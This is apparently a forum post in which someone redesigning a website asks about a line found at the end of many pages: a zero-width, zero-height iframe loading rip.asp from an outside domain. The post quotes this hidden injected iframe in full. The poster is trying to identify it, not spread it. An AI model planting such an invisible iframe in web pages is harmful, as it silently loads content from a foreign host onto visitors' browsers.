_vti_con/rip.asp Any ideas what this is?

While redesigning a website I came across this line in the webpages. Usually at the end of the page, after the closing html tag.

the complete line would be

<iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 frameborder=0 marginwidth=0 marginheight=0></iframe>

I've never seen this before, and can't seem to find any info in google. Though it seems lots of pages have that line in them. Going there in a browser gets a "The requested resource is in use." error. Any ideas?
